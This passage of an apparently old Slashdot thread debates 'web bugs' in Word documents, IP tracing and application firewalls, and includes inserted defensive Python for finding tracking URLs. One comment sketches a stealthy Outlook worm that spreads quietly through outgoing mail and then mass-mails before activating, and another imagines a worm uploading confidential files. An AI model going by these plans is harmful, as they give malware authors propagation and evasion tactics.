    Use Notepad! Or use the DOS command prompt and do a "print screen".

  74. Trojan! by www.sorehands.com · · Score: 2

    Adding these types of things would be essentially trojan programs. Same thing as ad-trackers using cookies. I would like to see some of these companies that use this type of things as basis of a charge under the computer trespass act.

  75. Re:WHY DON'T YOU EVER ANNOUNCE STORIES LIKE *THIS* by zCyl · · Score: 2

    Because anyone who wants to stay up-to-date on security problems with any Linux application can simply stay on the appropriate mailing list and find out when an update patch is available. Microsoft is a different phenomenon, and thus requires different media coverage. Also, the X-Chat vulnerability announcement comes with a fix, the Microsoft Word one is a continuing, acknowledged problem that will likely not be fixed, thus it becomes newsworthy.

  76. Re:This isn't much different than Web Pages alread by mcelrath · · Score: 2
    Her first reply was, "HOW CAN I MAKE IT NOT DO THAT?!?"

    FilterProxy can successfully remove web bugs.

    This message has been brought to you by Blatant Plug-O-Matic(tm)

    --Bob

    --
    1^2=1; (-1)^2=1; 1^2=(-1)^2; 1=-1; 1=0.
  77. Re: A disaster if Word is emasculated by Opinion+Dalek · · Score: 1

    The ability of Word to be fully automated is one of its better features, and one that I have used many times to provide clients with applications that do straightforward tasks.

    If the proposal is to disable something you can do in a browser, but not in a word processor, then you are going to end up with inconsistencies when using ActiveX/OLE etc. to do things.

    Whatever setting the user has in IE should be the setting in Word. Improve the IE options, rather than castrating word. Inconsistency between Office apps is bad enough at times (see Microsoft Office Annoyances) without adding to it.

  78. SBS e-banking passwords by EyesOfNostradamus · · Score: 2

    This week's Computerbild has a story about a new virus sniffing SBS (a Swiss bank) e-banking usernames and passwords using a similar technique. This is scary stuff, as real money is involved. Wanna bet that this e-banking service was marketed as "100% secure, because Bill Gates himself said so"?

    1. Re:SBS e-banking passwords by fReNeTiK · · Score: 1

      How old is "this week's" Computerbild for you? SBS merged with UBS a looong time ago...

      Just curious.

      Or was it a typo?

      --
      I strongly believe that trying to be clever is detrimental to your health. -- Linus Torvalds
  79. Likewise HTML news posts by AJWM · · Score: 1

    Ditto for reading newsgroups with an HTML-enabled newsreader.

    Something to keep in mind when browsing the alt.binaries.pictures newsgroups...

    --
    -- Alastair
  80. Why Word Documents Aren't a Big Deal. by xonix7 · · Score: 1

    What you have to realize is that while Word documents might be a big deal today, in the fast paced world of computing, they really won't be significant in the future. A new medium - a method - of transferring and communication between hosts, indeed - systems, business, communications and other systems - is emerging. XML.

    But is this really a computing only phenomenon? No, of course not. It maps directly to the rest of existence. The green Earth will still be here - those mountains, the green grass, the blue sky - even the black coal of the coal mines. That is your kingdom. When Microsoft is long forgotten, still the world will revolve as it has for billions of years. And in the death of Microsoft, perhaps a new star will be born. Perhaps a tree. Everything that exists lends itself to continued existence of some other thing.

    So it is with the world and indeed with Microsoft Word binary-format documents. Word format will eventually die, but perhaps something will arise, a good thing, and while it will contain some of the essence of Microsoft Word binary format documents, nature will forgive its misuse while its molecules were part of Microsoft's Word binary documents. Indeed, the very harddrives of the people using Word will be the vehicle for transformations like this, all over the world - and in the end, the world will continue as it has, for billions of years.

    --
    Everything is but a number spoken by itself.
    1. Re:Why Word Documents Aren't a Big Deal. by deusx · · Score: 2

      What you have to realize is that while Word documents might be a big deal today, in the fast paced world of computing, they really won't be significant in the future. A new medium - a method - of transferring and communication between hosts, indeed - systems, business, communications and other systems - is emerging. XML.

      I really hope we live in such a utopia someday.

      But, how long has there been a Microsoft Word? How much human information, knowledge, and communication is bound up in Microsoft Word documents, and how long will much of that legacy be relevant?

      And, considering how long there has been one, and the size and relevance of the legacy-- how long do you think we'll be dealing with binary formats like Word?

      The future usually maps better to William Gibson and Ridley Scott: There's the new, but those old layers of decades dirty old grunge and tech still persist refusing to die. I predict that we'll still need to open MS Word documents in 2010. Hell, I just had to open a WP v4 document the other day..

  81. ANOTHER RMS? by jaxn · · Score: 1

    Props to their CTO Richard M. Smith

    It looks like we have another R.M.S.

    --


    "Being alive is a crock of shit." --Kilgore Trout
  82. snowcrash by mattdm · · Score: 2
    reminds me of YT's mom in her government job, making sure to take 18 minutes to read a given document...

    --

  83. I can see it now... by EyesOfNostradamus · · Score: 2
    ... an Outlook+Word worm that uploads every document from the local C: drive, and from any shared network drives to a Web site. Or better: that posts them to Usenet (pointing a Worm to Web site is stoopid, as
    1. the web site can be shut down too easily
    2. it gives away your identity
    ). Or even better: only upload those documents that contain the words company confidential, for internal use only, trade secret or series of long numbers that look like bank account numbers. That way, you make better use of bandwidth.

    Ouch, that would hurt. Better buy those MSFT puts right away...

  84. Idunno about you (or that other guy) by DebtAngel · · Score: 2

    But since I use Opera, whenever IE wants to access the internet (usually, strangely enough, when I start it by mistake) I usually go NONONONONONONONONONONONONONO, and then press the No button.

    I am, however, worried as hell when my connection lights are flashing like the dickens and the ZoneAlarm graph stands still. I complained to my ISP, and they say it's RIP (!). Good thing I'm not actually paying for service...

    --

    Is this post not nifty? Sluggy Freelance. Worshi

  85. Comment removed by account_deleted · · Score: 1

    Comment removed based on user account deletion

  86. Does this affect people using ISP's? by skoda · · Score: 2

    Earnest question here:

    My understanding is that my IP address is dynamically assigned when I connect -- it's not the same from session to session.

    So what is gained from a web bug other than the knowledge of which ISP I'm using?

    It's not like my computer name (tacogato) would tell them anything. The ISP doesn't have my address, so a web bug can't get it either unless they can convert the IP to phone number and then reverse lookup to get my address. Is any of this possible? Or is this only a concern for those with static IP addresses?

    What about small businesses, often using a shared modem setup? Do they generally have static IPs? If not, it seems the web bug is not broadly useful.

    Could someone enlighten me please?
    -----
    D. Fischer

    1. Re:Does this affect people using ISP's? by abde · · Score: 1

      But the ISP does have logs of what IP address you were using at what time and date. With a subpoena (or maybe Carnivore?) that info could be extracted... I got spammed once by a real amateur who didn't fake his IP through Flash.net. I called up Flash.net's tech support and told them the IP, they gave me his username on the spot! I then wrote to the abuse email address and got his account revoked. It's that easy - and that's how powerful IP addresses are, even if you are at an ISP, for identification.


      JOIN !LINK CLUB!
      --
      Don't blame me - I voted for Howard Dean. http://dean2004.blogspot.com
    2. Re:Does this affect people using ISP's? by skoda · · Score: 2

      Thanks for the info; but I still don't see how a web bug is useful.

      To get the ISP logs, presumably, you need a subpoena, which means it's a criminal issue. If they are backtracking from an emailed document, couldn't use the recipient's server info, to backtrack the email to your ISP, and then to you.

      But if the web bug is a marketing tool, will the company be able to convert my dynamic IP to my email, username, etc. without those server logs? I guess it is helpful in that it would give general information about how a document is being spread geographically, and perhaps what companies are accessing it. But that's pretty vague, and certainly not a personal privacy problem.

      I don't want to imply I think this is a good thing, but I don't see how it's a big deal so far (at least until everyone has their own static IP).
      -----
      D. Fischer

    3. Re:Does this affect people using ISP's? by abde · · Score: 2

      Oh, I agree with you that this isn't a big deal from a privacy perspective. But you asked if a dynamic IP could mask your personal identity, and the short answer is, it can't. So someone who really wanted to know, and had the (legal, technological?) means to find out, could find out who you are.

      But you give out your IP every time you surf to any webpage anywhere, so this Word document *feature* is no worse a privacy concern than Apache weblogs, in my opinion. In fact, I would argue that this is a very useful feature. Most of the complaints seem to be knee-jerk anti-M$ sound and fury.


      JOIN !LINK CLUB!
      --
      Don't blame me - I voted for Howard Dean. http://dean2004.blogspot.com
    4. Re:Does this affect people using ISP's? by Detritus · · Score: 2
      To get the ISP logs, presumably, you need a subpoena, which means it's a criminal issue. If they are backtracking from an emailed document, couldn't use the recipient's server info, to backtrack the email to your ISP, and then to you.

      A lawyer can get a subpoena for a civil case, which covers a lot of territory. Plus, the ISP can release information from their logs without having received a subpoena. A subpoena is just a way of forcing them to disclose the information.

      --
      Mea navis aericumbens anguillis abundat
    5. Re:Does this affect people using ISP's? by skoda · · Score: 1

      Thanks for your response - I didn't mean to ask if a dynamic IP could completely mask my identity, since the ISP can always identify me at some level. I was more wondering about whether a web bug could identify me, which you addressed clearly.

      I consider this to be like those annoying virus hoaxes I perpetually get: frustrating, bothersome, and "bad" on a fundamental level, but largely inconsequential. I'm more concerned about what the grocery store does with my shopper's card info. :/
      -----
      D. Fischer

  87. Re:This isn't much different than Web Pages alread by knarf · · Score: 1

    StarOffice (version 5.2) is 'compatible' with this feature. I downloaded the document, and opened it in StarOffice 5.2, and was greeted by... my own hostname...

    AbiWord 0.7 is not yet 'compatible'. I have not tried KWord yet.

    --
    --frank[at]unternet.org
  88. Why not? by uradu · · Score: 2

    How about in a keyboard driver, like HP's latest? Any executable has the potential of networking, so people should slowly get used to this idea. One solution might be to have a kind of application firewall inside the OS, which lets you determine which apps should be allowed socket communications, and which not. And to be informed when an app tries to open a socket.

    Uwe Wolfgang Radu

    1. Re:Why not? by baka_boy · · Score: 3
      What, you meant implement some basic sort of sane security policies to prevent a single user's mistakes from fsck'ing the whole system? Or even design an OS with networking and multiuser access in mind? (Wow, that sure would be awfully tough...fifteen years ago, before it had been done in almost every one of the flavors of UNIX.)

      Or maybe you mean a more advanced architecture -- one that could apply different security models to code depending on whether it was being executed from a local or remote source, and which put potentially "suspect" applications into a limited sandbox? (Why, that sounds an awful lot like Java, circa the mid-90s...)

      Basically, Microsoft, however good they are at UI design, code reuse, or marketing, often drops the ball when it comes to security. They push the envelope of functionality far before they're ready to deal with the vulnerabilities that it can cause. That wouldn't even bother me so much if they didn't try to pass their tools off as "secure by default," and keep problems and risks under wraps until they can be silently patched in the next service pack.

    2. Re:Why not? by uradu · · Score: 2

      > Basically, Microsoft [...] often drops the ball when it comes to security.

      True, true. Except when it comes to making file system security understandable to mere mortals. I'm still somewhat in the dark regarding file access privileges. The other week I couldn't share a folder on my drive out as read-only, no matter what I did other users couldn't see the contents of subfolders. Eventually it turned out that the subfolders of this folder had somehow received their own privileges and the parent folder's security settings weren't being inherited. I had to go through all the subfolders and files and reset the privileges on each one before it finally worked. Ok, somewhat off topic, but still regarding MS-and-security.

      Uwe Wolfgang Radu

    3. Re:Why not? by Scott+Wood · · Score: 1
      Or even design an OS with networking and multiuser access in mind? (Wow, that sure would be awfully tough...fifteen years ago, before it had been done in almost every one of the flavors of UNIX.)

      Sorry, but UNIX (at least, most of them) can't do what was suggested, which was to completely deny networking, or impose limits on networking, to specific applications. UNIX security is primarily concerned with files, and if it's not a file, unless a special hack has been provided, you can't protect access to it. For true flexibility in these matters, you need to turn to a capability-based OS.

      --

    4. Re:Why not? by gilroy · · Score: 2
      Blockquoth the poster:
      One solution might be to have a kind of application firewall inside the OS, which lets you determine which apps should be allowed socket communications
      You mean, something like Zone Alarm?
    5. Re:Why not? by schoenk · · Score: 1

      Unfortunately for you, everything in Unix is a file.

    6. Re:Why not? by Scott+Wood · · Score: 1
      Oh? So where do I set file permissions on IP sockets? They behave like files in some ways, but not in others (in particular, they are not initially accessed via the filesystem namespace). And how exactly are things like semaphores, message queues, memory (other than raw physical or kernel memory), processes (/proc doesn't count), threads, signals, the scheduler, or higher level items such as user-interface widgets in any way represented by a file in UNIX or UNIX-like systems? They aren't. And even of those things which are files in UNIX, except for genuine files the protection mechanism is often far too coarse-grained to accomplish certain tasks. How, in UNIX, would I give a process the right to read raw data off a CD without giving it the right to make noise if an audio CD happens to be in the drive, or vice versa?

      --

    7. Re:Why not? by HerrGlock · · Score: 1

      You may want to read more about a UNIX filesystem. Networking and sockets are just more files in UNIX.

      http://w3.arizona.edu/ccithelp/sddocs/unix-intro.html

      4. UNIX Files and the File System: CONCEPTS

      In UNIX, everything is a file, and a file is simply a sequence of bytes without any particular structure.

      There are four basic kinds of files:

      ordinary files
      directories
      special files (also called device files, character files, or block files)
      links

      Ordinary files may be ASCII or binary. Special files are the interfaces for peripherals and other real and pseudo devices. One can open, read, and write on device files and directories just as with ordinary files, although the commands or system calls may be different for different file types.

      --
      Cav Pilot's Reference Page
      UNIX - Not just for Vestal Virgins anymore
    8. Re:Why not? by uradu · · Score: 2

      Thanks for the link, I went and downloaded it. To be honest, I've never been too concerned about the security of my own machine, since I usually have nothing invaluable on there that I couldn't lose. Most virus and such utilities can be a real pest and can get in your way at the worst times. But something like ZoneAlarm, if it does what I was talking about, would indeed be quite useful. Incidentally, is there any reason to go with the Pro version rather than the free one?

      Uwe Wolfgang Radu

    9. Re:Why not? by zeugma-amp · · Score: 1

      I guess the obvious question is:
      Is there a program for Linux that does what ZoneAlarm does?

      Z

      --
      This is an ex-parrot!
    10. Re:Why not? by jawtheshark · · Score: 1

      I tried ZoneAlarm on my principal PC, but unfortunately it is also the NAT server for my network and ZoneAlarm doesn't support NAT :-(
      Doesn't anyone know a similar program that monitors access to the internet (even logging would be fine, I'm not that paranoid) without having to disable the NAT?
      Besides, don't tell me I should set up a Linux box with a proxy and firewall, my mom already threatened to kill me because of all those UTP cables running through the house.

      --
      Ahhh...the great dumpster continuum. Many a free computer will be found there. -- sowth (748135)
    11. Re:Why not? by Phred+T.+Magnificent · · Score: 1

      Zone Alarm seemed like a good idea to me, too, but I have one question: Would Zone Alarm see the requesting application as Word, or would it see Internet Explorer (which, most likely, the user has already set as "allowed" to connect to the Internet)?

      --
      Where is the wisdom we have lost in knowledge?
      Where is the knowledge we have lost in information?
    12. Re:Why not? by Scott+Wood · · Score: 1
      I'm plenty familiar with UNIX filesystems, Thank You Very Much. Yes, sockets have file descriptors and can be operated upon with many of the same system calls, but that doesn't mean a damned thing when it comes to security, since they don't exist in the filesystem namespace (other than UNIX domain sockets, of course, but that's not particularly relevant to this discussion).

      So please, if sockets are "just more files in UNIX", tell me how I can set permissions such that a given process can not create one at all? I can do that with files. As for "everything is a file", see my prior post for a list of things which are NOT a file in any UNIX I've seen.

      Oh, and exactly what UNIX-like system differentiates between text and binary files at the filesystem level?


  89. Do not forget slow spread. by EyesOfNostradamus · · Score: 2

    One year? That is a helluva lot of time. Melissa and I love you were discovered within days, if not hours. Every single computer will have been cleaned before your virus activates...
    unless...
    you make yours much more discrete than Melissa and Iluvu. Do not mail yourself to every address book entry. No, just hook yourself into MAPI, and silently infect outgoing messages which the user sends. But only do it if the intended receiver has Outlook too (easy to find out by scanning the inbox and the archive for the last message by that user and looking at its headers). Even with this slow spread, one week should be enough to acquire a sizeable target market. One day before activation, go into "fast mode", and fire off automatic messages to all users who recently mailed us, and who have outlook. Subject would be Re: Subject of last received messages. Text would be entire quoted text of last received message. And then, let that puppy bark.

  90. this is great! er, except for MP3 piracy... by abde · · Score: 2

    What's the big deal? How many Word documents does anyone write that they distribute? How many Word documents written by someone else do you read? Who cares if the original author knows you are reading the document? Why would you be reading a Word document from an untrusted source anyway?

    what we should really be worried about is this part:

    This issue is potentially critical for music file formats such as MP3 files where piracy concerns are high. For example, it is easy to imagine an extended MP3 file format that supports embedded HTML for showing song credits, cover artwork, lyrics, and so on. The embedded HTML with embedded Web bugs could also be used to track how many times a song is played and by which computer, identified by its IP address.

    so there could eventually be Trojaned mp3 floating on Napster someday. Only way to avoid this would be to never upgrade Sonique, Winamp, or Media Player again...


    JOIN !LINK CLUB!
    --
    Don't blame me - I voted for Howard Dean. http://dean2004.blogspot.com
  91. Re:I have just one thing to say.... by shepd · · Score: 1

    You do know that Star Office has a web browser built in, right?

    In that case, what's to say the same thing can't be made to happen in Star Office?

    --
    If you could be told what you can see or read, then it follows that you could be told what to say or think - BoC
  92. Re:This isn't much different than Web Pages alread by Alternity · · Score: 2

    The problem at hand here is not being logged when we visit webpages. You could be logged just by opening an innocent looking Word document. Besides, with a webpage you can always look at the source and see there's a webbug...

    Who knows, maybe you even read some Word documents infested with those webbugs already.

    --


    "If liberty means anything at all, it means the right to tell people what they do not want to hear"
  93. Re:Software that requres net access during install by barracg8 · · Score: 2
    • The EFF or some such group should probably have a project to uncover and track such nasties.
    Not easy without the source.

    Now, what would be a good idea, would be to write a new, open source, OS, web browser, and office suite. If these were open source, it would be quite transparent when people tried to sneak this kind of crap into their products.

    :-)
    G

  94. [OT] What about Outlook? by fReNeTiK · · Score: 1

    Is there any way of doing this with Outlook? I mean forcing it to display everything in plain text. That would make life a lot less painful when reading mail from coworkers who just discovered that damn stationery feature...

    Yeah I know, format c: and replace with #fav_os. But sometimes you're not allowed to.

    --
    I strongly believe that trying to be clever is detrimental to your health. -- Linus Torvalds
  95. Oops, make that UBS by EyesOfNostradamus · · Score: 1

    More info here. That's dated August 17th, so given the usual lead times of dead-tree publications, it makes sense that it appeared in this week's edition.

  96. Bitch, Whine, and Moan!! by Hangtime · · Score: 2

    Is that all that goes on here anymore. Let's all take potshots at MS anytime they do anything! I can think of a couple of good things about this.

    Tracking internal document consumption - If you can place a cookie, you can track who and how many times something is read.

    Changing document data to reflect different visitations. If a user has already read the document and it hasn't changed it doesn't download the Word document.

    I am reminded of Shakespeare when I hear this: (approximation) Nothing is neither good nor evil but thinking makes it so. Of course somebody can do something malicious, but somebody can also do something positive. If you're that worried about it, download the document, open up your favorite text editor (insert here), open the Word document, strip out the header and footer information, and read it. Very simple. And for the joker who will point out what if it has pictures or some really brutal formatting that doesn't show up; well tell the folks that put it up on the website to save their document as HTML or a TXT file. Laters

    /me gets off my soapbox
    Hangtime

    If you continue to think what you have always thought, you will continue to get what you have always got.
    -Anonymous

  97. Re:This isn't much different than Web Pages alread by po_boy · · Score: 3
    phil_reed asked:
    Has anybody checked to see if the same thing happens in Excel?

    I cannot stress this enough, people. Read the articles referenced by slashdot before you post obvious questions.

    The article clearly states:

    In addition to Word documents, Web bugs can also be used in Excel 2000 and PowerPoint 2000 documents.

    So I would imagine that the answer is "yes. Someone has checked."

  98. Software I **PAY FOR** at the store should work by Anonymous Coward · · Score: 1

    Software I pay for ought not to require anything more from me. Everything I need had better be in that box so I can install it on my non-net connected laptop. Any additional needs better be printed on the outside of the package so I can pass it over at the store.

    1. Re:Software I **PAY FOR** at the store should work by pen · · Score: 1
      Could you please tell us what CD-R software package this is so that we can learn from your experience and not buy it?


  99. Re:Software that requres net access during install by quantum+bit · · Score: 1

    Ummmmmmmmm, yeah... And let's call these hypothetical Open Source projects Linux, BSD, Mozilla, etc...

    Isn't StarOffice going GPL soon if not already?

    :)

  100. Fallacy of the Transparent Society by SecurityGuy · · Score: 2
    I've read that article three times now and still disagree. The premise, apparently, is that technology will destroy privacy in the form of increasingly undetectable surveillance, so we'd better get used to it and embrace it. Whether we do or not, it will be used against us.

    I don't buy it. The premise that privacy and anonymity are a necessary casualty of technological advance is not necessarily true. It has been true thus far largely because privacy wasn't a design consideration in many of the systems we used. Most internet protocols were not designed to support privacy. HTTP is certainly in that category. The message is going out that privacy should be a design consideration. Zero Knowledge, for example, offers a service which reportedly encrypts your traffic and passes it through a series of servers to hide content and origin. Common cleartext protocols like telnet and ftp are being replaced by encrypted alternatives. Mr. Brin discusses privacy degrading technologies but doesn't concern himself with privacy preserving technologies which will grow in parallel.

    Realize too that concern about loss of privacy is well founded. If and when privacy evaporates there will be consequences, and not just decreased crime, which isn't necessarily true either. How many convenience store robberies have you seen on the local news, committed right in front of the obvious cameras? Criminals aren't known for their intelligence. Recall the story of the gentleman who fell in the supermarket and was confronted with his purchase record, which included regular purchases of alcohol, and the threat that this record would be used in any lawsuit brought against the store. Just because you've done nothing wrong, but rather something "everyone" does now and again, doesn't mean that information (which, quite frankly, is none of their concern) won't be misrepresented and turned against you.

    I've honored your request and read the article (again). Please do something useful as well: read Database Nation and understand the consequence of burning the privacy bridge. It's not an easy one to rebuild.

  101. Nope, ZoneAlarm catches Word. by DHartung · · Score: 3

    As well as any other Office applications, when they launch an HTML type of document. It's pretty easy to grant permission this one time only, too -- so you always know if programs that normally shouldn't be net-enabled are trying to slip one past you.

    Clearly you don't realize how either the "Internet Explorer component", or ZoneAlarm, works. Though Word uses the same HTML renderer, it is from within its own EXE. Granted, I don't kid myself that this will trap ALL instances of non-obvious internet use, but it goes a long way towards making me feel like I'm still in control.
    ----

    --
    lake effect weblog
    {Network engineer in Chicago--looking for work!}
  102. advertising by jafac · · Score: 1

    How long before the .Net version of Word gives us banner ads on our documents that we can not remove without a hex-editor (which would probably invalidate the checksum embedded in the GUID which would probably make Word crash, and corrupt your dial-up account so you couldn't access the internet anymore).

    Yeah, subscription fee: $100/month, or $50/month with banner ads.



    if it ain't broke, then fix it 'till it is!

    --

    These are my friends, See how they glisten. See this one shine, how he smiles in the light.
  103. Re:I have just one thing to say.... by Zico · · Score: 2

    Star Office

    Good point. From the Document Web Bugs FAQ:

    4. Are there any other programs that can use document Web bugs?

    Yes. The Privacy Foundation has found examples of this image linking ability in Microsoft's Office Suite, such as in PowerPoint 2000 and Excel 2000. They have also been detected in Sun Microsystems' Star Office.

    HTH, HAND.


    Cheers,

  104. WMA Music Format Has Bugs Too! by pryan · · Score: 1

    I noticed that the WMA format has bugs. When the song is finished playing, then some information in the WMA file is tripped and the player pops up a browser and goes to the URL specified in the WMA.

    This is seriously bad and I no longer even consider using the WMA format, even though it compresses better. That, and there isn't support under Linux as far as I know. I'll be sticking with my MP3s, thank you very much.

    The offending player is WinAmp with WMA support.

  105. Without wishing to defend MS... by sockeater · · Score: 1
    This is utter bollocks.

    "You can use a web server to see when a file on that server is accessed", not exactly groundbreaking insight.

    The idea that this is a secret bugging feature introduced by MS is nonsense. What it is is the ability to link to content hosted elsewhere which, in a funny sort of way, is exactly what the internet is all about.

    Anyone want to suggest the internet is just a great big spying conspiracy?

    Obviously, MS are sneaky types and, as the class action story earlier today makes clear, there's an "I'm a victim of MS tyranny too!" culture growing up.

    Compensation gravy-train, is the expression that springs to mind

    Anyone who thinks that what's being reported here is even slightly sinister needs to take a few deep breaths (And possibly a holiday)

    On the other hand, because of real problems, the sooner MS is controlled, the better for all of us.

    1. Re:Without wishing to defend MS... by norton_I · · Score: 2
      I don't think this is a sinister MS plot to allow greedy lap-dog corporate friends of microsoft to use their orbital mind control lasers on me, but I do think this is one in a long string of fundamental architectural designs by microsoft that while trying to adopt Sun's slogan "The network is the computer" ignore that there are rather seedy parts of that global computer. Internet users *need* process level sandboxing, strong authentication, fine grained access control, and that sort of thing. MS has decided, based on the highly skilled recommendations of their "moron estimator" that talking paperclips are more important. To be brutally honest to the UNIX crowd, they haven't done much better. Most commercial UNIXen install horribly insecurely by default--again part of the "who cares, it will be behind a firewall anyway" mentality. We have said "UNIX is secure because it has strong user-level access control", but single-user workstations need process level access control, to deal with the huge volume of untrusted code on the internet. There are some people working on better systems for free UNIX systems to perform those tasks, but they are a hell of a long way from prime-time.

      Much work has gone into making server systems secure. Most UNIX systems, and even NT can be relatively easily set up as a moderately secure web server. FreeBSD's jail() is a nice touch for secure virtual servers, and more esoteric systems like HP's virtual vault can give you more peace of mind yet (I am not convinced it is more secure than a properly configured Linux/BSD machine, but many bosses won't listen to that). However, client side security is a joke at best, and a catastrophe more often.

  106. Re:Software that requres net access during install by korr · · Score: 1
    Actually, it's really easy to uncover without the source...all the privacy group has to do is run a packet sniffer on their LAN and be on the lookout for packets coming out of the installation computer.

    Even with consumer backlash, I imagine that this sort of check will become very common as net access becomes more of a requirement to run a computer. Companies believe that they are losing way too much money due to piracy, and this sort of scheme will make it virtually impossible for Joe user to 'borrow' the Office 2000 CD from a friend.

    --

    Download a fast DirectX Tetris Clone [276 k]

  107. Re:This isn't much different than Web Pages alread by quonsar · · Score: 1

    FilterProxy can successfully remove web bugs.

    So? She was wanting to know how to make apache stop writing logs. FilterProxy can't do that.

    "I will gladly pay you today, sir, and eat up

  108. Re:This isn't much different than Web Pages alread by sjames · · Score: 2

    A couple of years ago, people didn't expect to have Word Processors to check your spelling as you type.

    True, let's boil it down to simple terms. "Except that people don't expect word processing documents to tattle on them when they read them".

    Unless the spell checkers these days post your most embarrassing mistakes on the net, the Word bug problem is worse by far!

  109. Re:This isn't much different than Web Pages alread by um...+Lucas · · Score: 1

    Zone Alarm should stop it then... you have to explicitly tell it what programs are allowed to access the internet. And from what I've found, it goes by the program making the request, not the DLL, so two programs can use IE's DLLs and only one will be able to get to the internet, if you're so inclined...

  110. Re:This isn't much different than Web Pages alread by jellicle · · Score: 1

    I cannot stress this enough, people. Read the articles referenced by slashdot before you post obvious questions.

    No kidding. I'm astonished by the number of questions posted in the comments that are answered two lines into the referenced URL. Look folks, the people who work behind the scenes at slashdot aren't trying to summarize the whole frigging article in a little blurb. We're trying to give you enough information to know whether you want to read it or not, or maybe a little info that isn't in the article. It is my unstated assumption that everyone who wants to post intelligent comments about a story will read it... but there are so many cases when this isn't true. Some of them are the slashdot trolls. But many aren't.

    Here's an open question: what can we (we meaning the slashdot crew) do to get people to read the stories before posting?

    --
    Michael Sims-michael at slashdot.org

  111. Tracking confidential documents? by Rakarra · · Score: 1
    This feature would only be useful in "tracking confidential documents" only if the person copying those confidential documents is most clueless. Ways I could easily get around those web bugs:
    1. View the document on a computer unconnected to the network
    2. strings confidential.doc
    3. Firewalling connections to the outside
    The list goes on? I like security through obscurity, but not when it's the only method of security, and certainly not when it gives a false sense of security.

    Now.. if this was some type of encrypted document that could only be viewed in MS Word with a network connection available to the original site... I wouldn't be quite as skeptical.
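
The `strings confidential.doc` approach from the post above, extended to list the remote URLs a document would contact. This is an added example, not part of the original comment; the sample bytes and `*.example` hosts are constructed, and the image-extension and query-string checks are heuristics assumed here.

```python
import re
import sys
from urllib.parse import urlsplit

# URL characters: printable ASCII except space, double quote, '<' and '>'.
_CH = rb"[\x21\x23-\x3b\x3d\x3f-\x7e]"
# Legacy Word files hold text either as 8-bit characters or as UTF-16LE,
# so search for both encodings of "http://" and "https://".
_URL_8BIT = re.compile(rb"https?://" + _CH + rb"+", re.I)
_URL_UTF16 = re.compile(
    rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:" + _CH + rb"\x00)+", re.I)

IMAGE_EXT = (".gif", ".jpg", ".jpeg", ".png", ".bmp")  # assumed list

# Constructed sample: OLE2 magic, some UTF-16LE text with a linked image URL,
# then 8-bit text containing an ordinary link and the same image URL again.
SAMPLE_DOC = (
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8
    + "Quarterly report draft\r".encode("utf-16-le")
    + "http://tracker.example/img/1pix.gif?doc=Q3-draft-0042".encode("utf-16-le")
    + b"\x00\x00\x15\x00"
    + b"See http://intranet.example/style/guide.html for formatting.\x00"
    + b"http://tracker.example/img/1pix.gif?doc=Q3-draft-0042\x00"
)


def extract_urls(data):
    """Return the distinct URLs found in raw document bytes, in order of discovery."""
    found = [m.group().decode("ascii") for m in _URL_8BIT.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in _URL_UTF16.finditer(data)]
    return list(dict.fromkeys(found))  # de-duplicate, keep order


def web_bug_candidates(data):
    """Describe each URL: host, whether it names an image, whether it carries a query token."""
    report = []
    for url in extract_urls(data):
        parts = urlsplit(url)
        report.append({
            "url": url,
            "host": parts.hostname,
            "image": parts.path.lower().endswith(IMAGE_EXT),
            "token": bool(parts.query),
        })
    return report


if __name__ == "__main__":
    # With a path argument, scan that file; otherwise scan the constructed sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            blob = fh.read()
    else:
        blob = SAMPLE_DOC
    for item in web_bug_candidates(blob):
        flag = "IMAGE" if item["image"] else "link "
        print(flag, "token" if item["token"] else "     ", item["url"])
```

Because the file is only read as bytes, nothing is fetched; an image URL with a per-document query string is the entry to look at first.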

  112. A functional alternative... by psicE · · Score: 2

    602pro. Look around, it's like a suite/pc office/something, forget the exact name. Comes with a word-clone, excel-clone, mspaint-clone (???), and faxer (???). No Access here, but FileMaker is better anyway and most database stuff can be done with a spreadsheet or the Label feature. You're also missing Outlook, but use Eudora. Best part, it's free.

  113. You can do this... by Sawbones · · Score: 2

    Well there isn't an option for that, but one way to help secure outlook is to set it to handle all HTML pages as files from the "restricted sites" security zone as opposed to the "internet" security zone - that way you can disable all sorts of scripting and activeX objects.

    Just:
    Tools->Options
    Security Tab
    Select "Restricted Sites" from the dropdown list.

    Cheers,
    - Sawbones

    --

    Ad in classifieds: Pandora's Box (no box) $5
    1. Re:You can do this... by Trepalium · · Score: 1
      That still doesn't stop HTML embedded images from "phoning home", and the default security settings for "Restricted Zone" doesn't disable scripting at all. ActiveX controls marked "safe for scripting" are still scriptable, as well as standalone JScript and VBScripts embedded into the HTML. The Java VM is still available, etc.

      None of these "technologies" have any place in e-mail. HTML e-mail is nice for some things, but not with this much potential for abuse. I can't think of one single legitimate reason why E-Mail needs to allow scripts to run, let alone ActiveX and Java applets.

      The so called Restricted Zone should be restricted to the point where anything that's not HTML and not on the same "site" as where the page resides isn't allowed. And MS's e-mail programs should use it by default!

      --
      I used up all my sick days, so I'm calling in dead.
  114. I know the answer to this by dattaway · · Score: 2

    What if someone were to embed the DeCSS code into a Word macro virus?

    "I love you DeCSS!"

  115. Re:Software that requres net access during install by barracg8 · · Score: 2

    But how do you detect what is legitimate behaviour? E.g., a Word document macro may request images be downloaded via http to be displayed in the document. There may be valid reason for this: the .doc file will download faster, allowing you to start reading the text while the images are still loading.

    But what if the macro encodes some data that it wishes to pass back to the server in the names of the image files it requests? E.g. instead of requesting grits.jpeg it requests grits_87.jpeg, passing a byte of data back to the server.

    Packet sniff all you like - at an IP level you will see packets flying back and forth, at a TCP level you will see a port 80 connection, at a http level you will see a valid and justified GET command (how do you know that grits_87.jpeg is not the real name of the file?).

    The only way that you could determine that the macro was evil was by looking at the source. Now, I have never looked at Word macro coding (I do my best to avoid looking at Word), but presumably like any scripting language you have the source there, you can check out what it is doing.

    But this thread is broader than Word macros, check the subject - 'net access during install'. How can you truly determine what any piece of software is doing with the socket communications it makes without checking the source?

    Packet sniffers are not enough - they tell you what is going on, but not why.

    cheers,
    G
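
The filename-as-data case described above (`grits_87.jpeg`), seen from the log side: an added example, not from the original post, that groups fetches by host and digit-normalised path and lists names that differ only in their digits. The log format, hosts and threshold are assumptions; a hit is a candidate for review, since numbered assets are often legitimate.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed proxy log lines (client, method, URL); not real traffic.
SAMPLE_LOG = """\
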